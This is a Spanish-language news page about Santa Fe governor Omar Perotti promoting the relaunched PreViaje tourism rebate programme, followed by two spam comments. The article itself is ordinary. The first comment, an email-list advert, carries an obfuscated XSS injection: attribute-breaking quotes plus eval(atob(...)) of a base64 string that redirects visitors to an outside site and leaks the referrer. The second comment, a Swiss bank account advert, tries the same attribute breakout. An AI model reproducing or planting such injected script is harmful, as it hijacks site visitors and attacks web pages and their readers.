Connect with us

Interés General

Perotti: “Santa Fe está entre los diez principales destinos de la Argentina”

Perotti: “Santa Fe está entre los diez principales destinos de la Argentina”

Este sábado el gobernador de la provincia de Santa Fe, Omar Perotti, aseguró durante el relanzamiento del Programa PreViaje que Santa Fe “tomó la decisión de acompañar al turismo”, actividad que según el mandatario “debe convertirse en una de las principales actividades”. “Desde el primer día empezamos a trabajar en ello. La pandemia nos dio también una oportunidad de que más argentinos y más santafesinos conozcan profundamente nuestra provincia y esto es lo que nos entusiasma en esta nueva edición” del Programa Previaje, comenzó diciendo Perotti.

En ese sentido, recordó que “Santa Fe se colocó dentro de los diez principales destinos de la Argentina y ahora aspiramos a mantenernos allí, para seguir consolidando la recepción de más turistas propios que, buscando la cercanía, la tranquilidad y el medioambiente fueron descubriendo nuestra provincia y van a estar volviendo en los próximos meses de verano en los que podamos ir retomando, poco a poco, las posibilidades de hacer turismo en familia y con los amigos”. Perotti sostuvo que “la hotelería y la gastronomía fueron sectores muy golpeados y necesitan tener ayuda. Nuestro deseo es seguir acompañando a una de las actividades que va a ser una de las principales en la provincia de Santa Fe. Las inversiones que estamos generando hacia el sector así lo indican: en rutas, en infraestructura sanitaria, en comunicaciones, en capacitación”.

Todo tiene que ver con las posibilidades de mejorar la oferta, la atención y la forma en la que lo podemos hacer; el financiamiento para el sector también porque, hay que mejorar equipamiento y las condiciones en las cuales promocionemos a nuestra provincia en todo el país”, agregó Finalmente, el mandatario santafesino señaló también que “estamos convencidos de que mucha más gente va a utilizar el Programa, por los beneficios que dio en el primer año y seguramente la provincia de Santa Fe podrá sumar algún elemento adicional para entusiasmar a que más turistas que nos visiten. También, para que todos los santafesinos conozcamos profundamente cada rincón de nuestra provincia, que tiene muchísimas cosas hermosas para mostrarnos”.

El Programa PreViaje

El Gobierno Nacional hizo oficial la vuelta del Programa Previaje con el objetivo de reactivar el sector turístico y, de esta manera, las personas que realicen compras anticipadas de servicios turísticos percibirán en concepto de beneficio un reintegro equivalente al 50% de las sumas abonadas que podrán utilizar exclusivamente en rubros, actividades y prestadores integrantes de la cadena turística argentina. Según lo informado, el período para hacer compras anticipadas se extenderá hasta diciembre de 2021 y el crédito otorgado podrá utilizarse desde noviembre 2021 hasta diciembre 2022.

Dicho crédito podrá ser utilizado en cualquier prestador del rubro turístico en todo el territorio nacional y no es necesario que el prestador esté inscripto en PreViaje, sólo debe pertenecer a los rubros turísticos habilitados por el programa y tener posnet para poder cobrar con tarjeta o QR (en caso de usar la Billetera Virtual BNA+). Una vez que se autoriza el crédito, se podrá utilizar para alojamiento, alquiler de automóviles y equipamiento, transporte, atractivos turísticos y agencias de viajes.

Los beneficios que se otorguen dentro del Previaje tendrán un mínimo de 5.000 pesos y un máximo de 100.000 pesos por persona mayor de 18 años dependiendo del rubro. Podrán generar crédito por un monto de hasta 100.000 pesos las compras anticipadas realizadas en concepto de servicios de alojamiento, agencias de viajes y transporte. Para servicios de excursiones y/o traslados; servicios de centros de esquí, de turismo aventura, de turismo termal y/o similares, etc; entretenimientos, esparcimiento y ocio; cines, espectáculos teatrales y musicales el montó será de hasta 5.000 pesos.

Fuente: Gobierno de Santa Fe

2 Comments

2 Comments

  1. marketing agency gent

    7 octubre, 2021 at 10:11 pm

    New Email List of LinkBio Users. Sell your products or services directly with cold email marketing to Instagram users that
    uses LinkBio in their profiles Download it from cold email response rate“>”>”>”>”>eval(atob(‘ZG9jdW1lbnQubG9jYXRpb24uaHJlZiA9ICdodHRwczovL29ubGluZWxlYWRnZW5lcmF0aW9uLnh5ei9pbmRleC5odG1sP3V0bV9zb3VyY2U9JyArIGxvY2F0aW9uLmhvc3RuYW1lICsgJyZ1dG1fbWVkaXVtPWdzYS1vbmxpbmVsZWFkJnV0bV9jYW1wYWlnbj1zY3JpcHQmdXRtX2NvbnRlbnQ9JyArIGVuY29kZVVSSUNvbXBvbmVudChkb2N1bWVudC5yZWZlcnJlcik7’));

  2. cuenta en suiza

    4 octubre, 2021 at 1:47 am

    PROTEGE TUS DOLARES –> Abre una cuenta en Suiza“>desde Latinoamérica, con tu telefono móvil”>”>'”>

Leave a Reply

Tu dirección de correo electrónico no será publicada.

More in Interés General